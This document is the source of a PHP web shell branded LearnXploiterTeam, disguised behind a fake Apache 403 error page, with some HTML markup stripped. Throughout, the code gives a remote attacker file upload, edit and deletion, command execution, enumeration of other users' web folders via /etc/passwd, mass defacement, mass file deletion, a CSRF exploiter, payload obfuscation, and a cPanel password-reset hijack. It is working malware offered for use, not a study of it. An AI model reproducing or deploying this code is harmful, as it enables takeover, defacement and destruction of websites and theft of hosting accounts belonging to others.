403 Forbidden '; ?> '; ?>

 You don't have permission to access on this server.

 Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


 Apache/2.2.14 (Ubuntu) Server at localhost Port 80 '; exit; } } ?> $value){ $_POST[$key] = stripslashes($value); } } echo ' Mini Shell LearnXploiterTeam DestaX - Suneo - Dimasz - HsxQxX7 - Ateng377 - Fira_MyZ - Satya Hekel - MrRown - Fy - LuffyGans404 - Azhari - GhostFuck07 - AnonymousR - Hasby -

-=[ LearnXploiterTeam ]=-

"; echo "
[ Home ] [ Jumping ] [ Mass Deface ] [ Server Info ] [ Mass Delete ] [ New File ]
[ New Folder ] [ Encode/Decode ] [ CSRF ]
[ Reset Cpanel ] [ About ] [ Logout ]

"; if(isset($_GET['filesrc'])){ echo "
Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Upload Berhasil
'; }else{ echo 'Upload Gagal
'; } } echo '
File Upload :
'; echo "
Command :
"; echo "
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Berhasil
'; }else{ echo 'Change Permission Gagal
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Berhasil
'; }else{ echo 'Ganti Nama Gagal
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Berhasil Edit File
'; }else{ echo 'Gagal Edit File
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Directory Terhapus
'; }else{ echo 'Directory Gagal Terhapus
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'File Terhapus
'; }else{ echo 'File Gagal Dihapus
'; } } } // command if($_POST['execmd']) { echo "
"; } // about elseif($_GET['array'] == 'about'){ echo "
أ— My Facebook أ—
أ— My Whatsapp أ—
أ— My Mail أ—
أ— My Team Fanspage أ—

"; } //Jumping elseif($_GET['array'] == 'jumping'){ $i = 0; echo "
"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)) {
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
"; } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } else { echo '
List Domains:

'; } } elseif(preg_match("/vhosts|vhost/", $dir)) { preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
";
			foreach($urls as $url) {
				$url = str_replace("www.", "", $url);
				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)) {
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
"; } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } else { echo '
List Domains:

'; } } else { echo "
";
		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "Can't read /etc/passwd";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[R] $user_jumping_dir";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[RW] $user_jumping_dir";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } else { echo "
"; } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } echo "
"; } //Server Info elseif($_GET['array'] == 'server_info'){ echo "Software : "; echo "".$_SERVER['SERVER_SOFTWARE']."
"; echo "PHP Version : "; echo "".PHP_VERSION.""; echo " | "; echo "OS : "; echo "".PHP_OS.""; echo "
Your IP : "; echo "".$_SERVER['REMOTE_ADDR'].""; echo " | "; echo "Server IP : "; echo "".gethostbyname($_SERVER['HTTP_HOST'])."
"; echo "Server : "; echo " ".php_uname()."

"; } // mass deface elseif($_GET['array'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo "
"; echo "
Tipe Mass Deface:
BiasaMassal
Folder:

Filename:

Index File:




"; } } // mass delete elseif($_GET['array'] == 'mass_delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "
"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "
"; } else { echo "
"; echo "
Folder:

Filename:




"; } } // create file elseif($_GET['array'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $option = "permission denied"; } } echo $option; echo "
Filename:


"; } // create dir / folder elseif($_GET['array'] == 'newfolder') { if($_POST['new_save_folder']) { $new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $option = "permission denied"; } else { $act = ""; } } echo $option; echo "
Folder Name:


"; } // csrf exploiter elseif($_GET['array'] == 'csrf'){ echo '
URL:
POST File:


'; $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; if($d) { echo "


"; } } // encode / decode elseif($_GET['array'] == 'endecode') { $text = $_POST['code']; $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'json' : $codi=json_encode(utf8_encode($text)); break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text))); break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text))); break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text)))); break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text)))))))))))); break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text)); break;case 'str2' : $codi=base64_encode(str_rot13($text)); break;case 'urlencode' : $codi=rawurlencode($text); break;case 'ur' : $codi=convert_uuencode($text); break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text)))))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'json' : $codi=utf8_dencode(json_dencode($text)); break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text))); break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text))); break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text)))); break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text)))))))))))); break;case 'gzinflates' : $codi=gzinflate(base64_decode($text)); break;case 'str2' : $codi=str_rot13(base64_decode($text)); break;case 'urlencode' : $codi=rawurldecode($text); break;case 'ur' : $codi=convert_uudecode($text); break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text))))))); break;default:break;}} $html = htmlentities(stripslashes($codi)); echo '



 


'; echo "


"; } // cpanel reset password elseif($_GET['array'] == 'cpanel'){ echo 'Reset Password Cpanel

Email :


'; $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); if(isset($_POST['submit'])){ $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = $site.':2083/resetpass?start=1'; echo '

Done by Array Gans
Klik disini



'; } } echo ''; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } echo ''; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; } echo '
Name
Size
Permission
Modify
'.$dir.'
--
'; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo '
'.$file.'
'.$size.'
'; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo '
'; } echo '

Copyright © LearnXploiterTeam
'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> Copyright © LearnXploiterTeam